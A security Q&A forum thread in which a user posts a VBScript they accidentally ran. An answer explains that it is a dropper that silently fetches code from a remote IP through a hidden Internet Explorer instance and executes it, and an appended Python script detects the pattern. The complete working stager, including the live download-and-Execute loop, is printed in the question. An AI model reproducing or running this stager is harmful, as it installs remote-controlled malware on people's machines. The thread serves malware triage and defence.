I unwisely opened the file. I was sure that Windows would ask me whether I really wanted to run this script, but unfortunately, it didn't. Now I am wondering what exactly that file is doing. Can anyone help?

Content of the file:

' fffff
' ssssss

Dim DSLOVIEI
Dim foxtomnum, ubigs
ubigs = 0
foxtomnum = "1118812"

Call SookCanalTV(2 + 2)

Function TroceSHello(kpserial)
   On Error Resume Next
    DSLOVIEI.Quit()
    Execute "" + kpserial + "" 
End Function

Function DSLOVIEIChek(stcurl)
 Set DSLOVIEI = CreateObject("InternetExplorer.Application")
 DSLOVIEI.Visible = 0
 DSLOVIEI.navigate stcurl

 While DSLOVIEI.ReadyState <> 4 : WScript.Sleep 110 : Wend

 DSLOVIEIChek  = DSLOVIEI.document.body.innerText
End Function

Sub SookCanalTV(one)
  On Error Resume Next
    While ubigs < one
        WScript.Sleep 10 + 3    
      Call onlineZolo()
        WScript.Sleep 11000
   Wend
End Sub

Function onlineZolo()
    Dim promazzzzz
    foxtomnum = CStr(foxtomnum + 1) 
    promazzzzz = DSLOVIEIChek("http://192.3.45.90/online.php?mdms=143760135&to=" + foxtomnum)
TroceSHello(promazzzzz)
End Function
JBudny
  • Unfortunately, we cannot do malicious code reviews. As you can imagine, we would get flooded with random code. – schroeder Dec 01 '18 at 10:54

1 Answer

Unfortunately, that VBS script appears to be a dropper which has installed malware on your computer. Your best option is to reinstall your operating system and start fresh.

The script has been uploaded to VirusTotal recently with indications of malware, and hybrid-analysis has further details of the malware after analysis.

The malware basically does the following:

  1. Creates an Internet Explorer process in the background
  2. Navigates to http://192.3.45.90/online.php?mdms=71464&to=1118813 multiple times, increasing the value of the to parameter each time to make different GET requests and download different VBS code
  3. Executes the downloaded VBS code, installing malware
Joe
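A static triage pass for the pattern the answer describes (hidden Internet Explorer automation, reading the page text, then `Execute` on it), added here as an example and not part of the original question or answer. The rule names and the sample script are constructed for illustration, and the sample uses a documentation-range address; the file is only read as text, never run.

```python
import re

# Static indicators for the fetch-then-Execute pattern in the question's script.
# Rule names are assumptions made for this example, not a standard rule set.
RULES = {
    "ie_automation": re.compile(r'CreateObject\s*\(\s*"InternetExplorer\.Application"', re.I),
    "hidden_window": re.compile(r'\.Visible\s*=\s*(0|False)\b', re.I),
    "navigate": re.compile(r'\.navigate\b', re.I),
    "reads_page_text": re.compile(r'\.document\.body\.innerText', re.I),
    "dynamic_execute": re.compile(r'^\s*(Execute|ExecuteGlobal)\b', re.I | re.M),
    "sleep_loop": re.compile(r'WScript\.Sleep\s+\d', re.I),
}
URL_RE = re.compile(r'"(https?://[^"]+)"', re.I)
RAW_IP_RE = re.compile(r'^https?://\d{1,3}(\.\d{1,3}){3}(?=[:/]|$)', re.I)

def strip_comments(source):
    """Drop full-line VBScript comments (' or Rem) so they cannot trigger rules."""
    keep = [ln for ln in source.splitlines()
            if not re.match(r"\s*('|rem\b)", ln, re.I)]
    return "\n".join(keep)

def defang(url):
    """Make a URL non-clickable for tickets and reports."""
    return url.replace("http", "hxxp", 1).replace(".", "[.]")

def triage(source):
    code = strip_comments(source)
    hits = sorted(name for name, rx in RULES.items() if rx.search(code))
    urls = URL_RE.findall(code)
    # Stager pattern: page text is fetched via IE and something is Execute'd.
    stager = {"ie_automation", "reads_page_text", "dynamic_execute"} <= set(hits)
    return {
        "indicators": hits,
        "urls": [defang(u) for u in urls],
        "raw_ip_urls": [defang(u) for u in urls if RAW_IP_RE.match(u)],
        "looks_like_stager": stager,
    }

# Constructed sample shaped like the script in the question (TEST-NET address).
SAMPLE = '''
' Execute "this comment must not count"
Set ie = CreateObject("InternetExplorer.Application")
ie.Visible = 0
ie.navigate "http://192.0.2.10/online.php?to=" + n
body = ie.document.body.innerText
Execute "" + body + ""
'''
```

Call `triage()` on the text of a suspect `.vbs` file; the defanged URLs it returns are what to search for in proxy and DNS logs.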